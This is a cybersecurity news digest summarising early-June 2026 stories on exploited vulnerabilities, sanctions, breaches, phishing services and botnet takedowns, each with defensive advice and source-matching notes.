U.S. sanctions Iran’s Nobitex crypto exchange over ransomware- and IRGC-linked transactions
7D ago 1 sources
RansomwareThreat Actors & APTsPolicy & RegulationGovernmentCryptocurrency & BlockchainNobitexOFACWallexBitpinRamzinexIRGC
The U.S. sanctioned Nobitex, Iran’s largest cryptocurrency exchange, saying it helped process transactions tied to ransomware actors and Iran’s Islamic Revolutionary Guard Corps. The Treasury’s Office of Foreign Assets Control also designated Nobitex executives and targeted other Iranian exchanges including Wallex, Bitpin, and Ramzinex as part of its "Economic Fury" campaign, alleging sanctions evasion and terrorist-financing support rather than a software flaw or CVE-tracked vulnerability.
Why it matters: This matters because ransomware groups and state-linked actors depend on payment channels to move money, and sanctions can disrupt those routes while raising compliance risk for exchanges, companies, and users who interact with them. Organizations handling crypto exposure should review sanctions screening and watch for links to designated wallets and entities.
Sources
Bill Toulas 2026.06.03 100%
This article establishes a distinct new story about OFAC’s sanctions action against Nobitex and related Iranian exchanges for allegedly facilitating ransomware- and IRGC-linked crypto activity.
Full page
Google fixes actively exploited Android zero-day CVE-2025-48595 in June 2026 security update
7D ago 4 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareConsumers & General PublicGoogleQualcomm
Google released Android security updates that fix an actively exploited flaw affecting devices running Android 14 and later. The zero-day, CVE-2025-48595, is a high-severity Android Framework vulnerability that Google says has seen limited targeted exploitation and can let a local attacker achieve code execution and privilege escalation. The June 2026 bulletins also patch 124 vulnerabilities in total, including 18 critical issues across Framework, System, Qualcomm components, and other closed-source and kernel-related parts.
Why it matters: People and organizations using Android devices may be exposed to a flaw already being used in real attacks, even if only in targeted cases. Apply the June 2026 Android security update as soon as your device vendor makes it available, with particular urgency for Pixel users and higher-risk targets.
Sources
Bill Toulas 2026.06.03 98%
This article updates the same underlying event around CVE-2025-48595 by adding that CISA has now placed the Android privilege-escalation flaw in the KEV catalog and set a June 5 remediation deadline for federal agencies.
info@thehackernews.com (The Hacker News) 2026.06.02 97%
This article appears to cover the same June 2026 Android security release, adding that Google patched 124 total flaws in the update while including the actively exploited zero-day CVE-2025-48595.
Eduard Kovacs 2026.06.02 99%
This article reports the same June 2026 Android security update and the same exploited zero-day, CVE-2025-48595, adding that the release patches 124 vulnerabilities total, including 18 critical issues and one additional remote code execution bug, CVE-2026-0059.
Sergiu Gatlan 2026.06.02 100%
This article establishes a new tracked story because it is the first item here about Google's June 2026 Android patch cycle and the actively exploited Android zero-day CVE-2025-48595.
Full page
CISA warns Linux kernel container-escape flaw CVE-2022-0492 is being exploited in the wild
7D ago 2 sources
Urgent PatchesThreat Actors & APTsZero-Days & CVEsGovernmentTechnology & SoftwareCISALinux
CISA says attackers are now exploiting a Linux kernel bug that can let someone break out of a container and gain root-level control on the host system. The flaw, CVE-2022-0492, is an improper authentication issue in Linux cgroups v1 that allows modification of the release_agent mechanism, enabling privilege escalation and container escape; CISA added it to the Known Exploited Vulnerabilities catalog after Kaspersky reported real-world exploitation, and federal agencies were told to patch by June 5.
Why it matters: Organizations running Linux containers could be at risk of full host compromise if affected systems are unpatched. This is urgent for cloud, server, and platform teams: identify systems using cgroups v1, apply available kernel fixes, and review container hardening and isolation settings immediately.
Sources
Bill Toulas 2026.06.03 99%
This is effectively the same event: CISA's KEV addition for CVE-2022-0492, the Linux kernel cgroups v1 container-escape and privilege-escalation flaw, with the article restating affected kernel ranges and patch guidance.
Ionut Arghire 2026.06.03 100%
This article establishes a distinct tracked event: the first formal CISA KEV warning and public confirmation of in-the-wild exploitation for Linux kernel flaw CVE-2022-0492.
Full page
Attackers exploit Kirki WordPress plugin flaw CVE-2026-8206 to hijack administrator accounts
7D ago 2 sources
Zero-Days & CVEsTechnology & SoftwareConsumers & General PublicWordPress
Attackers are exploiting a critical flaw in the Kirki WordPress plugin that can let them take over administrator accounts on affected websites. CVE-2026-8206 affects Kirki versions 6.0.0 through 6.0.6 and abuses a password-reset REST API endpoint so an unauthenticated attacker can send a valid reset link for any user to an attacker-controlled email address. Wordfence says it blocked more than 222 exploit attempts in 24 hours, and the fix shipped in version 6.0.7.
Why it matters: Sites using affected Kirki versions can be quickly hijacked, letting attackers change content, install malicious plugins, or plant persistent backdoors. This is urgent for WordPress administrators: update to 6.0.7 immediately or disable the plugin, and review privileged accounts for suspicious password resets or changes.
Sources
Ionut Arghire 2026.06.03 96%
This article updates the Kirki exploitation story with Defiant's observation that thousands of attacks were blocked in the past 24 hours, estimates roughly 150,000 sites may still be running vulnerable Kirki versions 6.0.0 to 6.0.6, and reiterates patching to 6.0.7+.
Bill Toulas 2026.06.02 100%
This article establishes a distinct new exploitation story centered on CVE-2026-8206 in the Kirki plugin, with active in-the-wild attacks and specific remediation guidance.
Full page
Attackers exploit Burst Statistics WordPress plugin flaw to create administrator accounts on vulnerable sites
7D ago 1 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareConsumers & General PublicBurst StatisticsWordPress
Attackers are targeting a flaw in the Burst Statistics WordPress plugin that can let outsiders take over websites by creating administrator accounts. Defiant says versions 3.4.0 to 3.4.1.1 contain an authentication bypass in application-password validation for REST API requests, allowing unauthenticated attackers to impersonate an admin for a request and use admin-level functions. Users should update to version 3.4.2 or newer.
Why it matters: Sites using Burst Statistics may be vulnerable to full website takeover, so this is urgent for WordPress administrators and hosting providers. Check plugin versions now, update immediately, and review for unexpected administrator accounts or suspicious REST API activity.
Sources
Ionut Arghire 2026.06.03 100%
The article establishes a distinct exploited-plugin event separate from the already tracked Kirki story by identifying active attacks against Burst Statistics, the affected versions, the attack method, and the patched version.
Full page
IMA Diligence Services says breach of third-party-managed legacy server exposed data of 525,000 people
7D ago 1 sources
Breaches & Data LeaksRansomwareLegal & Professional ServicesConsumers & General PublicIMA Diligence Services
IMA Diligence Services says attackers stole sensitive personal data from a legacy server managed by a third party, affecting 525,306 people. The company says the intruders accessed the server between December 8 and December 16 and exfiltrated files containing names, addresses, Social Security numbers, driver's license numbers, financial account and credit card data, medical and health insurance information, and in some cases passport and taxpayer ID numbers. SecurityWeek says the Genesis ransomware group previously claimed the attack and said it stole 700 GB of data.
Why it matters: This is a high-impact breach because it exposed the kinds of data that can be used for identity theft, fraud, and medical or financial scams. Affected people should watch for the company's notice, enroll in credit monitoring, and consider fraud alerts or account monitoring, while defenders should review third-party legacy systems and data-retention exposure.
Sources
Ionut Arghire 2026.06.03 100%
No existing tracked story covers this specific IMA Diligence Services breach event; this article appears to be the first concrete disclosure with victim count, data types, timeline, and a possible Genesis ransomware link.
Full page
Acer warns of two maximum-severity zero-days in Wave 7 routers and says fixes are coming by end of June
7D ago 1 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareConsumers & General PublicAcer
Acer says two critical security holes in its Wave 7 mesh routers could let attackers break in remotely, and patches are not available yet. The flaws, CVE-2026-49200 and CVE-2026-49201, affect Wave 7 routers running firmware T7c_GBL_1.01.000055 or earlier. One bug exposes plaintext web and Telnet credentials through an unauthenticated web-accessible log file, while the other uses a hardcoded AES key in backup handling to let attackers alter backups and implant persistent backdoor access.
Why it matters: People and organizations using affected Acer Wave 7 routers could face account compromise and long-term unauthorized access if devices are exposed. This is urgent because there is no patch yet; users should disable remote management or restrict it to trusted IP addresses and apply Acer's firmware update as soon as it is released.
Sources
Sergiu Gatlan 2026.06.03 100%
This article appears to be the first clear report establishing Acer's disclosure of CVE-2026-49200 and CVE-2026-49201, the affected Wave 7 firmware versions, interim mitigations, and the expected end-of-June fix window.
Full page
Unpatched Windows Search URI flaw can leak NTLMv2 hashes when users open malicious search links
7D ago 1 sources
Zero-Days & CVEsSocial Engineering & PhishingTechnology & SoftwareConsumers & General PublicMicrosoft
A newly reported Windows flaw can expose a user's NTLMv2 password hash, which attackers can try to crack or relay for unauthorized access. The issue affects the Windows Search URI protocol and can be triggered through crafted links or files that cause Windows to connect to an attacker-controlled server. The article indicates the bug is unpatched and enables hash disclosure rather than direct code execution.
Why it matters: Organizations that still rely on NTLM authentication could be exposed to credential theft from a single malicious link or lure, making this a meaningful phishing and lateral-movement risk. Defenders should block or monitor outbound SMB and WebDAV traffic, reduce NTLM use where possible, and warn users not to open unexpected search-related links or files until Microsoft issues a fix.
Sources
info@thehackernews.com (The Hacker News) 2026.06.03 100%
This appears to establish a distinct new story about an unpatched Windows Search URI credential-leak vulnerability, and it does not match any existing tracked story in the list.
Full page
Europol-backed Operation KRATOS 2 dismantles nine illegal streaming crime groups across 13 countries
7D ago 1 sources
Scams & FraudMalwareGovernmentMedia & EntertainmentTechnology & SoftwareConsumers & General PublicEuropol
Police in Europe and the United States say they broke up nine organized crime groups running illegal streaming services and arrested 29 suspects. The seven-month Operation KRATOS 2, led by Bulgaria with Europol support, involved 13 countries and led to the removal of more than 27,000 illegal streaming URLs, identification of 18,000 IP addresses tied to illegal services, 4,370 piracy-linked domains, nearly 400,000 additional URLs flagged for suspension, and 126,000 infringing objects. Investigators say the operators split public-facing sites from backend hosting across jurisdictions to evade takedowns.
Why it matters: People using pirate streaming services are not just risking copyright trouble; Europol says these platforms can also expose users to malware, spyware, and theft of personal data. The story matters because it shows the scale and international reach of the criminal infrastructure behind these services, and affected users should avoid such platforms and check devices for suspicious software if they used them.
Sources
Sergiu Gatlan 2026.06.03 100%
This article establishes a distinct new law-enforcement event, Operation KRATOS 2, separate from the previously tracked CINEMAGOAL takedown and other anti-piracy actions because it concerns a broader seven-month multinational crackdown on nine crime groups.
Full page
CISA adds seven actively exploited flaws, including Microsoft Defender CVE-2026-41091 and CVE-2026-45498, to KEV catalog
7D ago 4 sources
Urgent PatchesZero-Days & CVEsGovernmentTechnology & SoftwareConsumers & General PublicCISAMicrosoftAdobe
CISA added seven vulnerabilities to its Known Exploited Vulnerabilities catalog on May 20, 2026, citing evidence of active exploitation. The additions include legacy Microsoft Windows, DirectX, Internet Explorer, and Adobe Reader bugs, plus Microsoft Defender flaws CVE-2026-41091 (elevation of privilege) and CVE-2026-45498 (denial of service). Federal agencies must remediate by the deadlines set under BOD 22-01.
Why it matters: KEV additions indicate real-world exploitation and help defenders prioritize patching and mitigations. Organizations, especially federal agencies, should urgently assess exposure to the newly listed Microsoft Defender and legacy Windows-related vulnerabilities.
Sources
Eduard Kovacs 2026.06.03 36%
The story intersects because RedSun (CVE-2026-41091) and UnDefend (CVE-2026-45498) are among the disclosed Microsoft flaws discussed in this article, and the piece reiterates that some are exploited in the wild. However, this source is primarily about Microsoft's handling of the disclosure controversy, not CISA's KEV action itself.
Ionut Arghire 2026.05.21 96%
This article covers the same underlying event around Microsoft Defender flaws CVE-2026-41091 and CVE-2026-45498 being actively exploited and added to KEV, and adds specific patch details: Microsoft fixed them in Defender Antimalware Platform version 4.18.26040.7, described the impacts as local SYSTEM privilege escalation and DoS, noted disabled Defender systems are not exploitable, and linked the bugs to the publicly released BlueHammer variants RedSun and UnDefend.
Sergiu Gatlan 2026.05.21 96%
This source is about the same underlying event: active exploitation of Microsoft Defender flaws CVE-2026-41091 and CVE-2026-45498. It adds Microsoft's patch rollout details, affected component versions, the impact of each flaw (SYSTEM privilege escalation and DoS), and fixed versions defenders should verify.
CISA 2026.05.20 100%
This article is the primary CISA alert establishing a new KEV-driven remediation event covering seven specifically identified exploited CVEs.
Full page
Google rolls out Android fake-call detection to warn users about AI voice-clone and caller-ID spoofing scams
7D ago 1 sources
Scams & FraudSocial Engineering & PhishingTechnology & SoftwareTelecommunicationsConsumers & General PublicGoogle
Google is adding a new Android feature that warns people when a call may be a scammer pretending to be someone they know. The feature, called fake call detection, is rolling out globally this month on Android 12 and later, starting with Pixel devices, and is enabled by default. It works when both parties use Phone by Google, Contacts, and Google Messages with Rich Communication Services (RCS) enabled, using encrypted device-to-device verification to detect spoofed contact calls and trigger an on-screen warning.
Why it matters: This addresses a real-world fraud tactic that combines fake caller ID with AI-generated voice impersonation, which can trick people into sending money or revealing sensitive information. Android users should keep Google's phone and messaging apps updated and treat urgent calls asking for money, codes, or account access with caution.
Sources
Sergiu Gatlan 2026.06.03 100%
This article establishes a new story because it is the rollout announcement for Google's specific Android anti-deepfake-call protection, not an update to an existing tracked event.
Full page
WeedHack malware campaign infects more than 116,000 systems through fake Minecraft mods and cheats
8D ago 2 sources
MalwareSocial Engineering & PhishingScams & FraudConsumers & General PublicTechnology & SoftwareMedia & EntertainmentCryptocurrency & BlockchainMinecraftDiscordSteamTelegram
A large malware campaign has infected more than 116,000 computers by tricking Minecraft players into downloading booby-trapped mods, cheat clients, and utilities. McAfee says the WeedHack operation has been active since January 2026, spreads via YouTube links and search-result manipulation, and uses thousands of malicious Java archive (JAR) files. The malware steals browser passwords and cookies, Minecraft session IDs, Discord, Steam and Telegram credentials, and crypto-wallet data, while paid tiers add remote-control features such as keylogging, webcam access, shell access, and file management.
Why it matters: This is a broad consumer-focused infostealer campaign hitting gamers at scale, with stolen passwords, session tokens, and wallet data creating immediate account-takeover and financial risk. Minecraft players and parents should avoid unofficial mod download sites, remove suspicious JAR files, run antivirus scans, and reset passwords for any accounts used on affected devices.
Sources
Bill Toulas 2026.06.02 100%
This article establishes a distinct new malware campaign centered on Minecraft-themed lures, with named actor infrastructure, infection scale, and specific steal-and-remote-access capabilities.
Bill Toulas 2026.06.02 99%
This article is a direct report on the same WeedHack campaign, adding McAfee telemetry, distribution methods via YouTube and SEO poisoning, the malware-as-a-service dashboard details, and the free and premium feature sets used to steal credentials and remotely control victims' systems.
Full page
CISA says attackers are exploiting Oracle WebLogic server flaw CVE-2024-21182
8D ago 3 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareOracleCISA
A long-patched Oracle WebLogic Server vulnerability is now being exploited in real attacks, putting internet-facing servers at risk if they were not updated. CISA added CVE-2024-21182 to its Known Exploited Vulnerabilities catalog on June 1, 2026. Oracle patched the flaw in July 2024; it can be exploited remotely without authentication against affected WebLogic Server instances, and successful exploitation can expose sensitive data or allow broader server compromise.
Why it matters: Organizations running Oracle WebLogic should treat this as urgent because attackers no longer need valid logins to target exposed systems. Patch immediately, check whether any WebLogic servers are internet-accessible, and hunt for signs of compromise if updates were delayed.
Sources
info@thehackernews.com (The Hacker News) 2026.06.02 98%
This appears to be the same underlying event: active exploitation of Oracle WebLogic CVE-2024-21182 and its addition to the KEV catalog. The article mainly reinforces the KEV status and urgency rather than establishing a separate incident.
Sergiu Gatlan 2026.06.02 99%
This article is the same underlying event and adds operational detail that CISA ordered federal agencies to patch by June 4 under Binding Operational Directive 22-01, while noting affected WebLogic versions and internet exposure counts from Shodan.
Eduard Kovacs 2026.06.02 100%
This article establishes a distinct new tracked event: active exploitation and KEV listing of Oracle WebLogic CVE-2024-21182, not just Oracle's broader monthly patch cycle.
Full page
FBI warns Kali365 phishing service is hijacking Microsoft 365 accounts through OAuth device-code logins
8D ago 4 sources
Scams & FraudSocial Engineering & PhishingConsumers & General PublicTechnology & SoftwareFBIMicrosoft
The FBI says criminals are using a Telegram-based service called Kali365 to trick people into granting access to their Microsoft 365 accounts. The phishing-as-a-service platform, first seen in April 2026, abuses Microsoft's legitimate device-code login flow so victims authorize attacker-initiated sessions; the stolen OAuth access and refresh tokens can then be reused to access Outlook, Teams and OneDrive without needing the victim's password or another multi-factor authentication prompt.
Why it matters: This matters because victims can lose control of email, files and collaboration accounts even if multi-factor authentication is enabled. Organizations using Microsoft 365 should urgently review device-code login controls and token protections, monitor for suspicious inbox rules and token use, and warn users not to enter login codes from unsolicited emails.
Sources
Arctic Wolf Labs 2026.06.02 94%
This is the same underlying Kali365 operation and device-code phishing activity, but with substantive new details: Arctic Wolf links the operator to 126 malicious hosts, shows panel and token-capture infrastructure, and says the campaign has expanded beyond Microsoft 365 lures to Okta, Xerox DocuShare, GMX, Mail.ru, Yandex Disk, Odnoklassniki, and MAX Messenger account-takeover pages.
Arctic Wolf Labs 2026.06.02 97%
This is a direct follow-up on the same Kali365 operation: it adds new technical detail about the operator’s infrastructure, a cluster of 126 malicious hosts, and expansion beyond Microsoft 365-themed lures into Outlook, Okta, Xerox DocuShare, AWS-themed pages, and a MAX Messenger account-takeover campaign while continuing to abuse Microsoft OAuth device authorization to bypass MFA.
Lawrence Abrams 2026.05.25 99%
This article is the same underlying event: the FBI public warning on Kali365. It adds detail on Kali365's Telegram-based distribution, its two attack modes including the adversary-in-the-middle 'Cookie Link' option, links to prior Arctic Wolf reporting, and the FBI's recommended mitigations such as restricting device-code authentication and reviewing unauthorized device registrations.
2026.05.22 100%
This article establishes a distinct tracked story by tying April 2026 Microsoft 365 account-takeover campaigns to the specific Kali365 phishing-as-a-service platform and adding the FBI's public warning plus operational details on how the abuse works.
Full page
Russia's FSB says foreign intelligence planted spyware on senior officials' phones
8D ago 1 sources
Threat Actors & APTsSurveillance & PrivacyGovernmentTechnology & SoftwareFSB
Russia's domestic security service says foreign intelligence agencies hacked the mobile phones of senior Russian officials to spy on them. The FSB alleges malware on the devices collected correspondence, calls, geolocation, contact lists, and audio and video from the phones and their surroundings, and claims the operation relied on infrastructure from major international technology companies, including content delivery and security providers. No spyware family, infection method, or technical evidence was disclosed.
Why it matters: If true, this would be a significant government-targeted mobile espionage campaign with potential impact on sensitive state communications and surveillance exposure. Defenders should watch for technical indicators or vendor confirmations before taking the claims at face value, but mobile-device compromise at this level is high consequence.
Sources
2026.06.02 100%
This article establishes a distinct new alleged espionage incident from June 2026; while it references the 2023 iPhone-focused Operation Triangulation case, it does not tie the new claims to that same operation and provides a separate event anchor.
Full page
Microsoft Android apps exposed account tokens after debug flag was left enabled in Word, Excel, PowerPoint, OneNote, Loop and Copilot
8D ago 1 sources
Zero-Days & CVEsMobile MalwareTechnology & SoftwareConsumers & General PublicMicrosoft
Six Microsoft Android apps could hand Microsoft account tokens to unauthorized apps because a debug setting was left enabled in production code. SecurityWeek reports Enclave found the issue in Word, PowerPoint, Excel, Microsoft 365 Copilot, Microsoft Loop and OneNote for Android; the flag bypassed checks meant to restrict token sharing to trusted Microsoft apps, allowing any installed app to request reusable FOCI tokens and potentially access account data. No CVE is cited in the report.
Why it matters: People and organizations using these Android apps could have had account access tokens silently stolen by another app on the same phone, potentially enabling long-lived account access. This is urgent for Microsoft mobile users and defenders: watch for Microsoft’s fix, review mobile app trust and update practices, and investigate suspicious Android apps on managed devices.
Sources
Kevin Townsend 2026.06.02 100%
This article appears to be the first reporting on this specific Microsoft Android token-exposure flaw and establishes the underlying event.
Full page
HP patches critical CVE-2026-0826 in Poly VoIP phones that can let attackers remotely take over devices
8D ago 1 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareTelecommunicationsHP
HP released fixes for a critical flaw in several Poly Voice VoIP phone models that could let an attacker remotely seize control of a phone and use it as a foothold inside a company network. Rapid7 said CVE-2026-0826 is a stack-based buffer overflow in Session Description Protocol parsing when Interactive Connectivity Establishment is enabled, affecting Poly VVX 150/250/350/450 and Trio 8300/8500/8800 devices; a malicious SIP INVITE can trigger root-level remote code execution, and HP has published patched firmware.
Why it matters: Organizations using these desk and conference phones should treat this as urgent because compromised voice devices often sit on trusted internal networks and typically lack security tooling. Update affected Poly firmware now and disable ICE where it is not needed.
Sources
Ionut Arghire 2026.06.02 100%
This article appears to be the first tracked report establishing the disclosure, affected HP Poly models, CVE-2026-0826 details, attack path, and available mitigations.
Full page
Scammers spoof Northern Ireland police phone number to pose as officers and demand bank details and gift-card payments
8D ago 1 sources
Social Engineering & PhishingScams & FraudGovernmentFinance & BankingCryptocurrency & BlockchainConsumers & General PublicPolice Service of Northern Ireland
The Police Service of Northern Ireland warned that scammers spoofed its official switchboard number to call people while pretending to be police officers. In the reported case, the caller falsely claimed the target was tied to a money-transfer investigation, asked for bank-card information, and then requested gift cards and their codes; police said the number display was faked and no suspect has yet been arrested. The same police force also disclosed a separate crypto-investment fraud in which an elderly woman lost more than £250,000 after attackers persuaded her to install malware and took control of her devices.
Why it matters: People may trust a call that appears to come from a real police number, so this scam raises the risk of financial theft even for cautious users. Anyone receiving such a call should hang up, independently verify the number, and never provide banking details or gift-card codes to someone claiming to be law enforcement.
Sources
2026.06.02 100%
This article establishes a discrete, reportable fraud event: official police caller ID was spoofed to support an impersonation scam targeting the public.
Full page
Dashlane temporarily suspended some customer accounts during brute-force login attacks
8D ago 4 sources
Breaches & Data LeaksSocial Engineering & PhishingTechnology & SoftwareConsumers & General PublicDashlane
Dashlane says it temporarily locked some customer accounts after attackers repeatedly tried to register new devices and failed the required verification step. The company said the activity began Sunday, triggered automatic protections, and later moved to monitoring after restoring affected accounts. Dashlane said its internal systems were not compromised, but did not disclose how many users were hit or whether any account takeovers succeeded.
Why it matters: Password managers hold access to many other accounts, so even unsuccessful attacks are high-impact for users. Dashlane customers should verify recent login alerts, ensure multi-factor authentication is working, and contact support if their account was suspended or shows unfamiliar device activity.
Sources
Eduard Kovacs 2026.06.02 97%
This is the same underlying Dashlane brute-force campaign and adds the key impact detail that attackers successfully compromised some accounts and downloaded fewer than 20 encrypted personal-plan vaults after brute-forcing 2FA codes to register devices.
info@thehackernews.com (The Hacker News) 2026.06.02 98%
This appears to be the same Dashlane brute-force incident and adds a key update: attackers were able to download encrypted password vaults for fewer than 20 users, refining the scope and impact beyond the earlier account suspensions.
Bill Toulas 2026.06.01 99%
This article is a direct report on the same Dashlane incident, adding vendor confirmation that an external party targeted certain accounts in brute-force attacks, that suspensions were part of built-in protections, and that affected accounts were later unsuspended while additional safeguards were being implemented.
2026.06.01 100%
This article appears to be the first tracked report of Dashlane suspending user accounts in response to an ongoing brute-force campaign targeting customer logins and device registration.
Full page
Oracle's first monthly Critical Security Patch Update fixes 77 vulnerabilities across Database, E-Business Suite, REST Data Services and other products
8D ago 1 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareTelecommunicationsHospitality & TravelGovernmentOracle
Oracle released its first new monthly Critical Security Patch Update, fixing 77 vulnerabilities across several enterprise products used by businesses and public-sector organizations. The May 2026 update covers Oracle Database Server, REST Data Services, Communications, E-Business Suite, and Hospitality Applications, including about a dozen critical-severity flaws and multiple bugs that remote, unauthenticated attackers could exploit over a network. Oracle did not cite active exploitation in this notice but urged customers to patch quickly.
Why it matters: Organizations running affected Oracle software should treat this as a prompt patching event, especially where systems are internet-facing. Several flaws can be exploited remotely without logging in, so defenders should identify exposed Oracle services and apply the new updates as soon as possible.
Sources
Ionut Arghire 2026.06.02 100%
This article establishes a distinct patching story: Oracle's launch of monthly CSPU releases and the first batch of 77 fixes affecting multiple Oracle product lines.
Full page
Spain arrests suspect in doxing campaign that leaked personal data of INCIBE, police, prosecutors and other government employees
8D ago 2 sources
Breaches & Data LeaksSurveillance & PrivacyGovernmentLegal & Professional ServicesINCIBENational PoliceCivil GuardState Attorney General's OfficeNational Security Council
Spanish police arrested a suspect accused of leaking sensitive personal data belonging to employees at key state bodies including INCIBE, the National Police, the Civil Guard, the State Attorney General's Office, and the National Security Council. Authorities say the mass publication created immediate security risks for affected staff and institutions. INCIBE previously said its own systems were not directly breached and that the leak appeared to be assembled from older breaches, credential dumps, and open-source intelligence, with some records posted on BreachForums and Doxbin.
Why it matters: This is a real-world exposure of personal data tied to government and security personnel, which can enable harassment, phishing, impersonation, and physical-safety risks. Affected organizations and employees should treat exposed details as compromised, review account security, and watch for targeted social-engineering attempts.
Sources
2026.06.01 99%
This article appears to report the same arrest and underlying doxing campaign, adding that the leaked data was posted across multiple internet platforms and affected officials tied to the National Police, Civil Guard, Attorney General's Office, National Security Council, and INCIBE, with devices seized for forensic analysis.
Bill Toulas 2026.06.01 100%
This article establishes the core event: Spanish authorities arrested the alleged doxer after a mass leak of government employee data, adding law-enforcement confirmation and scope of affected institutions.
Full page
DriveSurge hijacks thousands of legitimate websites to push ClickFix and fake browser update malware
8D ago 1 sources
MalwareSocial Engineering & PhishingThreat Actors & APTsConsumers & General PublicTechnology & SoftwareGoogleMozillaMicrosoftApple
A threat actor called DriveSurge has compromised thousands of real websites and is using them to redirect visitors into malware traps. Silent Push says the actor operates as an initial access broker, using the zTDS traffic distribution system to decide whether each visitor sees a ClickFix lure that tricks them into running malicious PowerShell commands or a FakeUpdate page posing as browser updates for Chrome, Firefox, Edge, Safari and others; researchers also found macOS-targeting JavaScript and more than 80 malicious injection domains.
Why it matters: People can get infected just by visiting a legitimate site that has been silently hijacked, so the risk extends beyond obviously shady pages. Organizations should hunt for the identified JavaScript injection patterns and domains, and users should only update browsers through the built-in updater and never paste commands from pop-ups into Terminal or PowerShell.
Sources
Bill Toulas 2026.06.01 100%
This article appears to be the first tracked item establishing Silent Push's reporting on the DriveSurge campaign, its use of zTDS, and its large-scale website hijacking for ClickFix and FakeUpdate malware delivery.
Full page
Inspector general says NIST mismanagement left the National Vulnerability Database with a 27,000-entry backlog
9D ago 1 sources
Zero-Days & CVEsPolicy & RegulationGovernmentTechnology & SoftwareNISTCISA
A U.S. watchdog found that NIST’s National Vulnerability Database, a key public source used to track and prioritize software flaws, has become ineffective after mismanagement caused a massive processing backlog. The report says unprocessed vulnerability records grew from about 13,000 in February 2024 to more than 27,000 by the end of 2025, after NIST stopped paying contractors, missed its recovery goals, and duplicated at least 21,000 pieces of work already handled by CISA’s Vulnrichment program.
Why it matters: This matters because companies, government agencies, and security teams rely on NVD data to decide what to fix first, and delays can slow patching and risk decisions across the ecosystem. Affected users are indirect but broad: defenders may need to lean more on vendor advisories, CISA KEV, and other sources until NVD processing becomes reliable again.
Sources
2026.06.01 100%
This article establishes a distinct oversight and infrastructure story about NIST’s vulnerability-processing failures and the operational impact on the National Vulnerability Database, rather than updating a specific CVE or exploit event.
Full page
Researchers track 5,000+ election-themed domains and exposed political credentials ahead of the 2026 U.S. midterms
9D ago 1 sources
Social Engineering & PhishingScams & FraudDisinformation & Influence OpsGovernmentNonprofits & NGOsConsumers & General PublicActBlueWinRedGOPDemocrats.orgUSA.gov
Security researchers say more than 5,000 election-themed internet domains were registered in recent weeks ahead of the 2026 U.S. midterms, raising the risk of fake voting sites, donation scams, and impersonation of election officials. Check Point said the registrations increased sharply between April and May and coincided with roughly 17,000 exposed credentials tied to ActBlue, WinRed, GOP, Democrats.org, and USA.gov accounts, creating infrastructure and account access that could support phishing, fraud, or influence operations.
Why it matters: This matters because voters, donors, campaigns, and election workers could be tricked by lookalike sites or targeted through reused or stolen passwords. People should verify election and donation websites carefully, avoid links in unsolicited messages, and reset passwords if they may have been exposed.
Sources
2026.06.01 100%
This article establishes a distinct 2026 midterm-election threat story centered on a surge of election-themed domains and exposed credentials that could be used for phishing, impersonation, fraud, and misinformation.
Full page
Attackers exploit WP Maps Pro WordPress plugin flaw CVE-2026-8732 to create administrator accounts
9D ago 3 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareConsumers & General PublicWP Maps ProWordPress
Attackers are trying to take over WordPress sites that use the WP Maps Pro plugin by secretly creating their own administrator accounts. The bug, CVE-2026-8732, affects WP Maps Pro 6.1.0 and earlier and stems from an unauthenticated AJAX endpoint tied to a temporary support-access feature; a crafted request can create an admin user and generate a passwordless login link. Wordfence says it blocked more than 3,600 exploitation attempts in 24 hours, and the vendor fixed the issue in version 6.1.1 on May 20, 2026.
Why it matters: Any site running the vulnerable plugin can be fully taken over, letting attackers plant backdoors, change content, or steal data. Users should update WP Maps Pro to 6.1.1 or later immediately and review WordPress admin accounts for unexpected new users.
Sources
Ionut Arghire 2026.06.01 99%
This article is the same underlying event: active exploitation of CVE-2026-8732 in the WP Maps Pro plugin. It adds technical details on the root cause in the AJAX temporary-access callback, notes that version 6.1.1 fixes the issue, and reports Defiant blocked more than 1,700 attack attempts in 24 hours.
info@thehackernews.com (The Hacker News) 2026.06.01 99%
This article covers the same underlying event: active exploitation of the WP Maps Pro flaw CVE-2026-8732 to create rogue admin accounts on vulnerable WordPress sites.
Bill Toulas 2026.05.31 100%
This article establishes a distinct new story: active exploitation of CVE-2026-8732 in the WP Maps Pro plugin, including the flaw details, affected versions, patch release, and observed attack volume.
Full page
Dutch police say they disrupted a botnet of at least 17 million infected devices after tracing 200 servers in the Netherlands
9D ago 3 sources
MalwareThreat Actors & APTsGovernmentTechnology & SoftwareTelecommunicationsConsumers & General PublicDutch PoliceNCSC-NL
Dutch police say they helped dismantle a botnet made up of at least 17 million compromised devices, with 200 supporting servers traced to the Netherlands and seized or shut down with help from a hosting provider. Authorities and NCSC-NL did not name the botnet or specify the exact malware family, but said affected devices likely included poorly secured routers, mobile devices, and Internet of Things hardware commonly abused for phishing, distributed denial-of-service attacks, and online fraud.
Why it matters: A botnet this large can be used to hide attacks, knock services offline, and abuse ordinary people's devices without their knowledge. Users and organizations should check internet-connected devices for updates, replace default passwords, and avoid unofficial app sources while defenders watch for follow-on indicators once police release more details.
Sources
Ionut Arghire 2026.06.01 99%
This article is another report on the same Dutch police takedown, adding that authorities seized several command-and-control servers from a Dutch hosting provider, that local reporting identified the targeted service as Asocks, and that the botnet included infected computers, smartphones, and tablets used for residential proxy abuse and cybercrime.
Bill Toulas 2026.05.29 99%
This is the same underlying event: Dutch police and the NCSC disrupting a botnet of at least 17 million infected devices and seizing more than 200 servers in the Netherlands. The article adds attribution reported by local media linking the infrastructure to the Asocks proxy service and notes authorities' view that affected device owners likely did not knowingly participate.
2026.05.29 100%
This article appears to be the first report establishing this specific Dutch police takedown of an unnamed 17 million-device botnet, and it does not match any listed existing tracked story.
Full page
Malware on nearly 2,000 WordPress sites used Steam profiles to hide command data and maintain backdoor access
9D ago 1 sources
MalwareTechnology & SoftwareConsumers & General PublicWordPressSteam
